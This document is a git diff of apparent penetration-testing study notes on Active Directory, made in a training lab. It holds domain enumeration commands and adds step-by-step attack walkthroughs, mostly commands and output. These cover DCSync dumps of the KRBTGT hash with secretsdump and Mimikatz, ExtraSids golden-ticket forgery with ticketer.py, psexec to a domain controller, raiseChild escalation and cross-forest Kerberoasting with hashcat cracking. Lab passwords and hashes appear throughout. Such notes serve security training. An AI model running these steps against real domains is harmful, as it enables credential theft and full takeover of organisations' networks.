List users with domain admin privileges -net group "Domain Admins" /domain - -# List of PCs connected to the domain -net group "domain computers" /domain - -# List PC accounts of domains controllers -net group "Domain Controllers" /domain - -# User that belongs to the group -net group /domain - -# List of domain groups -net groups /domain - -# All available groups -net localgroup - -# List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default) -net localgroup administrators /domain - -# Information about a group (admins) -net localgroup Administrators - -# Add user to administrators -net localgroup administrators [username] /add - -# Check current shares -net share - -# Get information about a user within the domain -net user /domain - -# List all users of the domain -net user /domain - -# Information about the current user -net user %username% - -# Mount the share locally -net use x: \computer\share - -# Get a list of computers -net view - -# Shares on the domains -net view /all /domain[:domainname] - -# List shares of a computer -net view \computer /ALL - -# List of PCs of the domain -net view /domain -``` - -#### Dsquery - -[Dsquery](dsquery.md) is a helpful command-line tool that can be utilized to find Active Directory objects. - -`dsquery` will exist on any host with the `Active Directory Domain Services Role` installed, and the `dsquery` DLL exists on all modern Windows systems by default now and can be found at `C:\Windows\System32\dsquery.dll`. - -All we need is elevated privileges on a host or the ability to run an instance of Command Prompt or PowerShell from a `SYSTEM` context. - -```powershell -# User Search -dsquery user - -# Computer Search -dsquery computer - -# List objects in an OU -dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL" - -# List Users With Specific Attributes Set (PASSWD_NOTREQD) by Combining dsquery with LDAP search filters of our choosing. The below looks for users with the PASSWD_NOTREQD flag set in the userAccountControl attribute. -dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl - -# Searching for Domain Controllers - dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=8192)" -limit 5 -attr sAMAccountName -# userAccountControl:1.2.840.113556.1.4.803: Specifies that we are looking at the User Account Control (UAC) attributes for an object. This portion can change to include three different values we will explain below when searching for information in AD (also known as Object Identifiers (OIDs). -# =8192 represents the decimal bitmask we want to match in this search. This decimal number corresponds to a corresponding UAC Attribute flag that determines if an attribute like password is not required or account is locked is set. - -# Search users with UAC set to `Password Can't Change`: -dsquery * -filter "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=64))" - -``` - - -## 6. Shares - -### From Windows - -#### Snaffler - -[See snaffler](snaffler.md). - -Snaffler](https://github.com/SnaffCon/Snaffler) is a tool for **pentesters** and **red teamers** to help find delicious candy needles (creds mostly, but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment). _Broadly speaking_ - it gets a list of Windows computers from Active Directory, then spreads out its snaffly appendages to them all to figure out which ones have file shares, and whether you can read them. - - - -```bash -Snaffler.exe -s -d $domain -o snaffler.log -v data -# -s: prints results to the console -# -d: specifies the domain to search within -# -o: writes results to a logfile -# -v: verbosity level. "data" is best as it only displays results to the screen -``` - -### From Linux - -#### crackmapexec - -[CrackMapExec](crackmapexec.md): - -```shell-session -# Enumerate shares -crackmapexec smb $ip -u -p --shares - -# The module spider_plus will dig through each readable share on the host and list all readable files. -sudo crackmapexec smb $ip --local-auth -u -p -d -M spider_plus --share 'NameOfShare' -# CME writes the results to a JSON file located at /tmp/cme_spider_plus/ - -``` - - -#### SMBMap - -[smbmap](smbmap.md) - -```bash -# Enumerate network shares and access associated permissions. -smbmap -H $ip - -# # Enumerate network shares and access associated permissions with recursivity -smbmap -H $ip -r -# --dir-only: provides only the output of all directories and did not list all files. - -# Check access and permissions level for a folder with recursion -smbmap -u $username -p $password -d $domain -H $ip -R $nameofFolder --dir-only - - -``` - -#### rpcclient - -[rpcclient](rpcclient.md) - -```bash -# SMB NULL Session with rpcclient -rpcclient -U "" -N $ip -``` - - - -```shell-session -# SMB NULL Session with rpcclient -rpcclient -U "" -N $ip - -# Connect to a remote shared folder (same as smbclient in this regard) -rpcclient -U "" 10.129.14.128 -rpcclient -U'%' 10.10.110.17 - -# Server information -srvinfo - -# Enumerate all domains that are deployed in the network -enumdomains - -# Provides domain, server, and user information of deployed domains. -querydominfo - -# Enumerates all available shares. -netshareenumall - -# Provides information about a specific share. -netsharegetinfo - -# Get Domain Password Information -getdompwinfo - -# Enumerates all domain users. -enumdomusers - -# Provides information about a specific user. -queryuser - # An example: - # rpcclient $> queryuser 0x3e8 - -# Provides information about a specific group. -querygroup - -# Enumerating Privileges -enumprivs - -# Enumerating SID from LSA -lsaenumsid -``` diff --git a/docs/389-636-ldap.md b/docs/389-636-ldap.md index fa71603b8..8e92f7e6b 100644 --- a/docs/389-636-ldap.md +++ b/docs/389-636-ldap.md @@ -26,7 +26,7 @@ The relationship between AD and LDAP can be compared to Apache and HTTP. The sam - It's a binary protocol and by default not encrypted. - Has been updated to include encryptions addons, as Transport Layer Security (TLS)/SSL and can be tunnelled through SSH -The hierarchy (tree) of information stored via LDAP is known as the Directory Information Tree (DIT). That structure is defined in a schema. +The hierarchy (tree) of information stored via LDAP is known as the **Directory Information Tree (DIT).** That structure is defined in a schema. A common use of LDAP is to provide a central place to store usernames and passwords. This allows many different applications and services to connect to the LDAP server to validate users. diff --git a/docs/active-directory-from-linux-enumeration.md b/docs/active-directory-from-linux-enumeration.md index 4764cc149..63c7dfbf1 100644 --- a/docs/active-directory-from-linux-enumeration.md +++ b/docs/active-directory-from-linux-enumeration.md @@ -381,30 +381,6 @@ It's possible to obtain the Ticket Granting Ticket (TGT) for any account that ha ASREPRoasting is similar to Kerberoasting, but it involves attacking the AS-REP instead of the TGS-REP. An SPN is not required. This setting can be enumerated with PowerView or built-in tools such as the PowerShell AD module. -#### DONT_REQ_PREAUTH Value using Get-DomainUser - -Enumerating for DONT_REQ_PREAUTH Value using Get-DomainUser - -```powershell -Import-Module .\PowerView.ps1 -Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl -``` - -With this information in hand, the Rubeus tool can be leveraged to retrieve the AS-REP in the proper format for offline hash cracking. This attack does not require any domain user context and can be done by just knowing the SAM name for the user without Kerberos pre-auth. - -```powershell -# Retrieving AS-REP in Proper Format using Rubeus -.\Rubeus.exe asreproast /user:$user /nowrap /format:hashcat -# Example: -# .\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat -``` - -Cracking the Hash Offline with Hashcat: - -```bash -hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt -``` - #### DONT_REQ_PREAUTH Value using kerbrute ```shell-session diff --git a/docs/active-directory-from-linux-privilege-escalation.md b/docs/active-directory-from-linux-privilege-escalation.md index 80e0feefe..195e97597 100644 --- a/docs/active-directory-from-linux-privilege-escalation.md +++ b/docs/active-directory-from-linux-privilege-escalation.md @@ -87,7 +87,7 @@ domain\user22 ``` -## Kerberoasting +## 🔐 Kerberoasting [See about Kerberos authentication](kerberos-authentication.md). @@ -165,3 +165,314 @@ hashcat -m 13100 file_tgs /usr/share/wordlists/rockyou.txt #### targetedKerberoast [targetedKerberoast](https://github.com/ShutdownRepo/targetedKerberoast) is a Python script that can, like many others (e.g. GetUserSPNs.py), print "kerberoast" hashes for user accounts that have a SPN set. This tool brings the following additional feature: for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute), print the "kerberoast" hash, and delete the temporary SPN set for that operation. This is called targeted Kerberoasting. This tool can be used against all users of a domain, or supplied in a list, or one user supplied in the CLI. + + +## 👀 Attacking Domain Trusts # 1: Child -> Parent Trusts + +### 🏰 ExtraSids Attack + +Requirements for performing the attack: + +- The KRBTGT hash for the child domain +- The SID for the child domain +- The name of a target user in the child domain (does not need to exist!) +- The FQDN of the child domain +- The SID of the Enterprise Admins group of the root domain + +We have complete control over the child domain, which would be: LOGISTICS.INLANEFREIGHT.LOCAL. + +#### Step 1: getting the KRBTGT hash for the child domain + +We will perform a DCSync attack with secretsdump.py: + +```shell-session +secretsdump.py $targetedDomain/$UserWithAdminPriv@$TargetedIP -just-dc-user $NetbiosNameofDomain/krbtgt + +# Example: +# secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt +# Enter password: HTB_@cademy_stdnt_admin! +``` + +For this we need: +- The user (`htb-student_adm`) must have the necessary privileges to query the domain controller. We need their creds. +- We require to know $targetedDomain and NetbiosNameofDomain. +- The **Impacket** library must be installed, and the tool should be executed in an environment with Python support. +- Network connectivity to the target IP (in this example `172.16.5.240`) is required. + +Results: + +``` +Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation + +Password: +[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) +[*] Using the DRSUAPI method to get NTDS.DIT secrets +krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9d765b482771505cbe97411065964d5f::: +[*] Kerberos keys grabbed +krbtgt:aes256-cts-hmac-sha1-96:d9a2d6659c2a182bc93913bbfa90ecbead94d49dad64d23996724390cb833fb8 +krbtgt:aes128-cts-hmac-sha1-96:ca289e175c372cebd18083983f88c03e +krbtgt:des-cbc-md5:fee04c3d026d7538 + +``` + +#### Step 2: getting the SID for the child domain + +Next, we can use [lookupsid.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/lookupsid.py) , an Impacket script used for querying a Windows system to obtain information about the SID associated with a given user or group. + +The tool will give us back the SID for the domain and the RIDs for each user and group that could be used to create their SID in the format `DOMAIN_SID-RID`. + +```shell-session +lookupsid.py $targetedDomain/$UserWithAdminPriv@TargetedIP +# Example: +# lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 +# Enter password: HTB_@cademy_stdnt_admin! +``` + +If we just want to get the Domain SID, we can filter it out: + +```shell-session +lookupsid.py $targetedDomain/$UserWithAdminPriv@TargetedIP | grep "Domain SID" +# Example: +# lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID" +# Enter password: HTB_@cademy_stdnt_admin! +``` + +Results: S-1-5-21-2806153819-209893948-922872689 + +#### Step 3: getting the name of a target user in the child domain (does not need to exist!) + +For instance, `hacker`. + +#### Step 4: getting the FQDN of the child domain. + +logistics.inlanefreight.local + + +#### Step 5: getting the SID of the Enterprise Admins group of the root domain + +Next, we can rerun the command, targeting the INLANEFREIGHT Domain Controller (DC01) at 172.16.5.5. We will perform a **SID enumeration** on the target system and filter the results to find information related to the **Enterprise Admins** group in the Active Directory (AD) domain. For filtering we will use the RID of the Enterprise Admins group. [Here](active-directory-security-identifiers.md) is a handy list of well-known SIDs. + +```shell-session +lookupsid.py $targetedDomain/$UserWithAdminPriv@$DomainControllerIP | grep "Enterprise Admins" +# Example: +# lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep "Enterprise Admins" +# Enter password: HTB_@cademy_stdnt_admin! + +# Way2: +lookupsid.py LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm@INLANEFREIGHT.LOCAL | grep "Enterprise Admins" +# Enter password: HTB_@cademy_stdnt_admin! +``` + +Result: +``` +519: INLANEFREIGHT\Enterprise Admins (SidTypeGroup) +``` + +As the domain SID was: `S-1-5-21-3842939050-3880317879-2865463114` and the RID is `519`, the SID of "Enterprise Admin" group is `S-1-5-21-3842939050-3880317879-2865463114-519` . + + +#### Step 6: Generate a golden ticket + +Next, we can use [ticketer.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py) from the Impacket toolkit to construct a Golden Ticket. This ticket will be valid to access resources in the child domain (specified by `-domain-sid`) and the parent domain (specified by `-extra-sid`). + +```shell-session +ticketer.py -nthash $KRBTGThashOfChildDomain -domain $targetedDomain -domain-sid $sidDomain -extra-sid $SIDofEnterpriseAdminGroup $madeupUserName +# Example: +# ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker +``` + +The ticket will be saved down to our system as a credential cache (ccache) file, which is a file used to hold Kerberos credentials: + +``` +[*] Saving ticket in hacker.ccache +``` + + +Setting the KRB5CCNAME environment variable tells the system to use this file for Kerberos authentication attempts. + +```shell-session +export KRB5CCNAME=hacker.ccache +``` + + +We can check if we can successfully authenticate to the parent domain's Domain Controller using [Impacket's version of Psexec](impacket-psexec.md). If successful, we will be dropped into a SYSTEM shell on the target Domain Controller. + +```shell-session +psexec.py $targetedDomain/$madeupUser@$hostNameDC.$ParentDomain -k -no-pass -target-ip $DomainControllerIP +# Example: +# psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5 +# Enter password: HTB_@cademy_stdnt_admin! +``` + + +#### Step 7: Privilege escalation + +Impacket also has the tool [raiseChild.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/raiseChild.py), which will automate escalating from child to parent domain. + +We need to specify the target domain controller and credentials for an administrative user in the child domain. + +```shell-session +raiseChild.py -target-exec $DomainControllerIP $TargetedDomain/$UserWithAdminPriv +# Example: +# raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm +# Enter password: HTB_@cademy_stdnt_admin! +# target-exec: If specified, then it will authenticate to the parent domain's Domain Controller via Psexec. + +``` + + +#### Step 8: Accessing another user on domain + +The following will reproduce the entire attack: + + +``` +#### Step 1: getting the KRBTGT hash for the child domain +secretsdump.py $targetedDomain/$UserWithAdminPriv@$TargetedIP -just-dc-user $NetbiosNameofDomain/krbtgt + +# Example: +# secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt +# Enter password: HTB_@cademy_stdnt_admin! +# Results: 9d765b482771505cbe97411065964d5f +#### + +#### Step 2: getting the SID for the child domain. Obtain the SID for the domain and the RIDs for each user and group and filter out by Domain SID +lookupsid.py $targetedDomain/$UserWithAdminPriv@TargetedIP | grep "Domain SID" + +# Example: +# lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID" +# Enter password: HTB_@cademy_stdnt_admin! +# Results: S-1-5-21-2806153819-209893948-922872689 +#### + +#### Step 3: getting the name of a target user in the child domain (does not need to exist!) +hacker +#### + +#### Step 4: getting the FQDN of the child domain. +logistics.inlanefreight.local +#### + +#### Step 5: getting the SID of the Enterprise Admins group of the root domain +lookupsid.py $targetedDomain/$UserWithAdminPriv@$DomainControllerIP | grep "Enterprise Admins" +# Example: +# lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep "Enterprise Admins" +# Enter password: HTB_@cademy_stdnt_admin! +# Results: 519: INLANEFREIGHT\Enterprise Admins (SidTypeGroup) +#### + +#### Step 6: Generate a golden ticket +ticketer.py -nthash $KRBTGThashOfChildDomain -domain $targetedDomain -domain-sid $sidDomain -extra-sid $SIDofEnterpriseAdminGroup $madeupUserName +# Example: +# ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker + +# The ticket will be saved down to our system as a credential cache (ccache) file, which is a file used to hold Kerberos credentials: +[*] Saving ticket in hacker.ccache + +# Setting the KRB5CCNAME environment variable tells the system to use this file for Kerberos authentication attempts. +export KRB5CCNAME=hacker.ccache +#### + +#### Step 7: Accessing another user on domain +# With one user, we will request the NTLM hash for another user +secretsdump.py $ControlledUsername@$hostnameController.$Parentdomain -k -no-pass -just-dc-ntlm -just-dc-user $targetUsername +# Example: +# secretsdump.py hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -just-dc-ntlm -just-dc-user bross + +``` + +### 🌳 Cross-Forest Kerberoasting + + Sometimes you cannot escalate privileges in your current domain, but instead can obtain a Kerberos ticket and crack a hash for an administrative user in another domain that has Domain/Enterprise Admin privileges in both domains. +  +To do this, we need credentials for a user that can authenticate into the other domain and specify the `-target-domain` flag in our command. +  +```shell-session +GetUserSPNs.py -target-domain $targetedDomain $OurDomain/$ourUserSamAccountName +# Example: +# GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley +# Enter password: transporter@4 +``` + + +Rerunning the command with the `-request` flag added gives us the TGS ticket. + +```shell-session +GetUserSPNs.py -request -target-domain $targetedDomain $OurDomain/$ourUserSamAccountName +# Example: +# GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley +# Enter password: transporter@4 +``` + +Now, with those TGS we could try to crack them offline + +```bash +hashcat -m 13100 tickettocrack /usr/share/wordlists/rockyou.txt +``` + + +### 🐇 Hunting Foreign Group Membership with Bloodhound-python + +we may, from time to time, see users or admins from one domain as members of a group in another domain.  Since only `Domain Local Groups` allow users from outside their forest, it is not uncommon to see a highly privileged user from Domain A as a member of the built-in administrators group in domain B when dealing with a bidirectional forest trust relationship. + + If we are testing from a Linux host, we can gather this information by using the [Python implementation of BloodHound](https://github.com/fox-it/BloodHound.py). + +**Collecting information from INLANEFREIGHT.LOCAL** + +```shell-session +sudo nano /etc/resolv.conf +``` + +Modify the file so it will have the following entries: + +``` +#nameserver 1.1.1.1 +#nameserver 8.8.8.8 +domain INLANEFREIGHT.LOCAL +nameserver 172.16.5.5 +``` + +Running bloodhound-python Against INLANEFREIGHT.LOCAL: + +```bash +bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EA-DC01 -c All -u forend -p Klmcargo2 +``` + +We can compress the resultant zip files to upload one single zip file directly into the BloodHound GUI. + +```shell-session +zip -r ilfreight_bh.zip *.json +``` + + +**Collecting information from INLANEFREIGHT.LOCAL** + +```shell-session +sudo nano /etc/resolv.conf +``` + +Modify the file so it will have the following entries: + +```shell-session +#nameserver 1.1.1.1 +#nameserver 8.8.8.8 +domain FREIGHTLOGISTICS.LOCAL +nameserver 172.16.5.238 +``` + +Running bloodhound-python Against FREIGHTLOGISTICS.LOCAL + +```shell-session +bloodhound-python -d FREIGHTLOGISTICS.LOCAL -dc ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -c All -u forend@inlanefreight.local -p Klmcargo2 +``` + +We can compress the resultant zip files to upload one single zip file directly into the BloodHound GUI. + +```shell-session +zip -r FREIGHTLOGISTICS.zip *.json +``` + +Transfer the files to your attacker machine, open [Bloodhound](bloodhound.md) in your attacker machine, upload the zip. Now we can click on Users with Foreign Domain Group Membership under the Analysis tab and select the source domain as INLANEFREIGHT.LOCAL. Here, we will see the built-in Administrator account for the INLANEFREIGHT.LOCAL domain is a member of the built-in Administrators group in the FREIGHTLOGISTICS.LOCAL domain as we saw previously. + +![](img/blood03.png) + diff --git a/docs/active-directory-from-windows-attacks.md b/docs/active-directory-from-windows-attacks.md index 5c017b36d..4de822423 100644 --- a/docs/active-directory-from-windows-attacks.md +++ b/docs/active-directory-from-windows-attacks.md @@ -198,7 +198,7 @@ GET NTLMV2USERNAMES [See https://www.crowdstrike.com/en-us/blog/cve-2020-1472-zerologon-security-advisory/.](https://www.crowdstrike.com/en-us/blog/cve-2020-1472-zerologon-security-advisory/) -## ⛓️DCShadow +## ⛓️ DCShadow [See https://blog.netwrix.com/2022/09/28/dcshadow_attack/](https://blog.netwrix.com/2022/09/28/dcshadow_attack/) diff --git a/docs/active-directory-from-windows-enumeration.md b/docs/active-directory-from-windows-enumeration.md index 9be56d77d..8dd651e3a 100644 --- a/docs/active-directory-from-windows-enumeration.md +++ b/docs/active-directory-from-windows-enumeration.md @@ -26,7 +26,6 @@ tags: - **Tool for enumeration**: - [Enumeration with LDAP queries](389-636-ldap.md) @@ -1111,3 +1110,116 @@ Get-GPO -Guid $GUID [See how to take this attack further](active-directory-from-windows-attacks.md#group-policy-object-abuse). +## 9. Trust Relationships + +### Introduction to Domain Trust Overview + +A trust creates a link between the authentication systems of two domains and may allow either one-way or two-way (bidirectional) communication. + +Types of trusts: + +- `Parent-child`: Two or more domains within the same forest. The child domain has a two-way transitive trust with the parent domain, meaning that users in the child domain `corp.inlanefreight.local` could authenticate into the parent domain `inlanefreight.local`, and vice-versa. +- `Cross-link`: A trust between child domains to speed up authentication. +- `External`: A non-transitive trust between two separate domains in separate forests which are not already joined by a forest trust. This type of trust utilizes [SID filtering](https://www.serverbrain.org/active-directory-2008/sid-history-and-sid-filtering.html) or filters out authentication requests (by SID) not from the trusted domain. +- `Tree-root`: A two-way transitive trust between a forest root domain and a new tree root domain. They are created by design when you set up a new tree root domain within a forest. +- `Forest`: A transitive trust between two forest root domains. +- [ESAE](https://docs.microsoft.com/en-us/security/compass/esae-retirement): A bastion forest used to manage Active Directory. + + +Trusts can be transitive or non-transitive: + +- A `transitive` trust means that trust is extended to objects that the child domain trusts: + - Shared, 1 to many. + - The trust is shared with anyone in the forest. + - Forest, tree-root, parent-child, and cross-link trusts are transitive. +- In a non-transitive trust, the child domain itself is the only one trusted: + - Direct trust. + - Not extended to the next level child domains. + - Typical for external or custom trust setup. + + +Trusts can be set up in two directions: one-way or two-way (bidirectional): + +- - `One-way trust`: Users in a `trusted` domain can access resources in a trusting domain, not vice-versa. +- `Bidirectional trust`: Users from both trusting domains can access resources in the other domain. + +### Windows binary: nltest + +Similar, but very simplified information could be gleaned from a native Windows binary: + +```powershell +nltest /domain_trusts +``` + + +### Powershell + +Powershell way of checking trust relationships: + +```powershell +([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() +``` + +### Active Directory module: Get-ADTrust + +[See complete Active directory powershell module](activedirectory-powershell-module.md). + +```powershell +Import-Module activedirectory +Get-ADTrust -Filter * +``` + +Pay attention to properties such as Direction, ForestTransitive and some others. + +From here we could enumerate users in the child domain: + +```powershell +Get-DomainUser -Domain $domain | select SamAccountName +# Example: +# Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName +``` + + +### PowerView.ps1 module: Get-DomainTrust + +PowerView can be used to perform a domain trust mapping and provide information such as the type of trust (parent/child, external, forest) and the direction of the trust (one-way or bidirectional). + +```powershell +Import-Module .\PowerView.ps1 +Get-DomainTrust +``` + +Also we could do some mapping: + +```powershell +Get-DomainTrustMapping +``` + +### netdom + +The `netdom query` sub-command of the `netdom` command-line tool in Windows can retrieve information about the domain, including a list of workstations, servers, and domain trusts. + +```cmd-session +# List trusts: +netdom query /domain:$domain trust +# Example: +# netdom query /domain:inlanefreight.local trust + +# Enumerate Domain Controllers with accounts in the domain +netdom query /domain:$domain dc +# Example: +# netdom query /domain:inlanefreight.local dc + +# query workstations and servers +netdom query /domain:$domain workstation +# Example: +# netdom query /domain:inlanefreight.local workstation +``` + + +### Visualizing Trust Relationships in BloodHound + +[See more about bloodhound](bloodhound.md). + +![](img/blood02.png) + diff --git a/docs/active-directory-from-windows-privilege-escalation.md b/docs/active-directory-from-windows-privilege-escalation.md index 6c91efae8..544424550 100644 --- a/docs/active-directory-from-windows-privilege-escalation.md +++ b/docs/active-directory-from-windows-privilege-escalation.md @@ -255,6 +255,11 @@ The vulnerability allowed a forged PAC to be accepted by the KDC as legitimate. ### ❗ Kerberos Resource-Based Constrained Delegation (RBCD) [PENDING] +### The Golden Ticket attack + +**The attack in a nugshell:** First, we need to obtain the NT hash for the KRBTGT account, which is a service account for the Key Distribution Center (KDC) in Active Directory. The account KRB (Kerberos) TGT (Ticket Granting Ticket) is used to encrypt/sign all Kerberos tickets granted within a given domain. Domain controllers use the account's password to decrypt and validate Kerberos tickets. The KRBTGT account can be used to create Kerberos TGT tickets that can be used to request TGS tickets for any service on any host in the domain. This is also known as the Golden Ticket attack and is a well-known persistence mechanism for attackers in Active Directory environments.  The only way to invalidate a Golden Ticket is to change the password of the KRBTGT account. + + ### Kerberos "Double Hop" Problem **Kerberos "Double Hop" Problem**: The "Double Hop" problem often occurs when using WinRM/Powershell or Evil-WinRM, since the default authentication mechanism only provides a ticket to access a specific resource (winrm). When we use Kerberos to establish a remote session, we are not using a password for authentication, and the user's ticket-granting service (TGS) ticket is sent to the remote service, but the TGT ticket is not sent. Therefore, when we try to authenticate over a second resource, the machine can not pull any hash from memory or generate any TGS to authenticate us. @@ -1039,6 +1044,300 @@ This repository provides a few techniques and scripts regarding the impact of Mi If we can compromise an Exchange server, this will often lead to Domain Admin privileges. +## 👀 Attacking Domain Trusts # 1: Child -> Parent Trusts + +### ExtraSids Attack - Mimikatz + +The sidHistory attribute is used in migration scenarios. If a user in one domain is migrated to another domain, a new account is created in the second domain. The original user's SID will be added to the new user's SID history attribute, ensuring that the user can still access resources in the original domain. + +The attack explained in a nugshell: + +- Using Mimikatz, an attacker can perform SID history injection and add an administrator account to the SID History attribute of an account they control. +- When logging in with this account, all of the SIDs associated with the account are added to the user's token. +- If the SID of a Domain Admin account is added to the SID History attribute of this account, then this account will be able to perform DCSync and create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001/) or a Kerberos ticket-granting ticket (TGT), which will allow for us to authenticate as any account in the domain of our choosing for further persistence. + +#### Introduction to SID History and SID Filtering +[SID Filtering](https://www.serverbrain.org/active-directory-2008/sid-history-and-sid-filtering.html) prevents such abuse by verifying and blocking unauthorized or suspicious SIDs during authentication across a trust. + +>**SID History** exists specifically to allow migrated users to access resources in the original domain. Enabling SID Filtering disrupts this functionality by ignoring SID history during authentication across trust boundaries. This trade-off arises because: +> +>1. **Functionality Comes with Risk:** + Allowing SID history in a trust scenario opens the door for **privilege escalation attacks** through SID injection. + > +>2. **SID History is Not Always Needed:** + > +> - In many migration scenarios, users may no longer need access to the original domain once migration is complete. In such cases, the risks of allowing SID history outweigh the benefits. +> - SID Filtering is particularly useful in inter-forest or external trust scenarios where one environment does not fully trust the security practices of the other. +> +>3. **Balancing Security and Usability:** +> Organizations must evaluate their specific requirements. If SID history functionality is crucial, **SID Filtering can be disabled selectively** for specific trusts while mitigating risks through other means (e.g., enhanced monitoring or strict trust policies). + + +> **Why SID Filtering is Still Useful** +> +>While SID Filtering blocks the main functionality of SID history, its purpose is not to disable SID history entirely but to **control where and when SID history can be used**: +> +>- **Within the Same Forest:** +> SID Filtering is typically not applied to intra-forest authentication because all domains in a forest share the same schema and security boundary. SID History works seamlessly here. + > Example: Users migrating between domains in the same forest (`DomainA.local` to `DomainB.local`) can use SID history without interference. + > +>- **Between Different Forests:** + Trusts between forests (or external domains) are high-risk. SID Filtering ensures that only valid SIDs from the trusted forest or domain are honored, blocking any unauthorized or injected SIDs. + +#### The attack + +To perform this attack after compromising a child domain, we need the following: + +- The KRBTGT hash for the child domain +- The SID for the child domain +- The name of a target user in the child domain (does not need to exist!) +- The FQDN of the child domain. +- The SID of the Enterprise Admins group of the root domain. +- With this data collected, the attack can be performed with Mimikatz. + +##### Step 1: getting the KRBTGT hash from the child domain +First, we need to obtain the NT hash for the [KRBTGT](https://adsecurity.org/?p=483) account, which is a service account for the Key Distribution Center (KDC) in Active Directory. + +Since we have compromised the child domain, we can log in as a Domain Admin or similar and perform the DCSync attack to obtain the NT hash for the KRBTGT account. + +```cmd-session +# Go to mimikatz.exe file in the explorer and execute as admin + +lsadump::dcsync /user:$domain\$user +# Example: +# .\mimikatz.exe +# lsadump::dcsync /user:LOGISTICS\krbtgt +``` + +Results: + +``` +[DC] 'LOGISTICS.INLANEFREIGHT.LOCAL' will be the domain +[DC] 'ACADEMY-EA-DC02.LOGISTICS.INLANEFREIGHT.LOCAL' will be the DC server +[DC] 'LOGISTICS\krbtgt' will be the user account +[rpc] Service : ldap +[rpc] AuthnSvc : GSS_NEGOTIATE (9) + +Object RDN : krbtgt + +** SAM ACCOUNT ** + +SAM Username : krbtgt +Account Type : 30000000 ( USER_OBJECT ) +User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT ) +Account expiration : +Password last change : 11/1/2021 10:21:33 AM +Object Security ID : S-1-5-21-2806153819-209893948-922872689-502 +Object Relative ID : 502 + +Credentials: + Hash NTLM: 9d765b482771505cbe97411065964d5f + ntlm- 0: 9d765b482771505cbe97411065964d5f + lm - 0: 69df324191d4a80f0ed100c10f20561e + +Supplemental Credentials: + +SNIP + +``` + +KRBTGT hash : `9d765b482771505cbe97411065964d5f`. + +##### Step 2: getting the SID for the child domain + +```powershell +Import-Module .\PowerView.ps1 +Get-DomainSID +``` + +However it was also visible in the Mimikatz output above. + +##### Step 3: getting the name of a target user in the child domain (does not need to exist!) + +For instance, `hacker`. + +##### Step 4: getting the FQDN of the child domain. + +It was also visible in the Mimikatz output above: `LOGISTICS.INLANEFREIGHT.LOCAL`. + + +##### Step 5: getting the SID of the Enterprise Admins group of the root domain + +Next, we can use `Get-DomainGroup` from PowerView to obtain the SID for the Enterprise Admins group in the parent domain. + +```powershell +Get-DomainGroup -Domain $domain -Identity "$GroupName" | select distinguishedname,objectsid +# Example: +# Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid +``` + +We could also do this with the [Get-ADGroup](https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps) cmdlet: + +```powershell +Get-ADGroup -Identity "$GroupName" -Server "$DomainServer"` +# Example: +# Get-ADGroup -Identity "Enterprise Admins" -Server "INLANEFREIGHT.LOCAL" +``` + +Results: + +``` +distinguishedname objectsid +----------------- --------- +CN=Enterprise Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL S-1-5-21-3842939050-3880317879-2865463114-519 +``` + + +##### Step 6: The attack + +- The KRBTGT hash for the child domain: `9d765b482771505cbe97411065964d5f` +- The SID for the child domain: `S-1-5-21-2806153819-209893948-922872689` +- The name of a target user in the child domain (does not need to exist to create our Golden Ticket!): We'll choose a fake user: `hacker` +- The FQDN of the child domain: `LOGISTICS.INLANEFREIGHT.LOCAL` +- The SID of the Enterprise Admins group of the root domain: 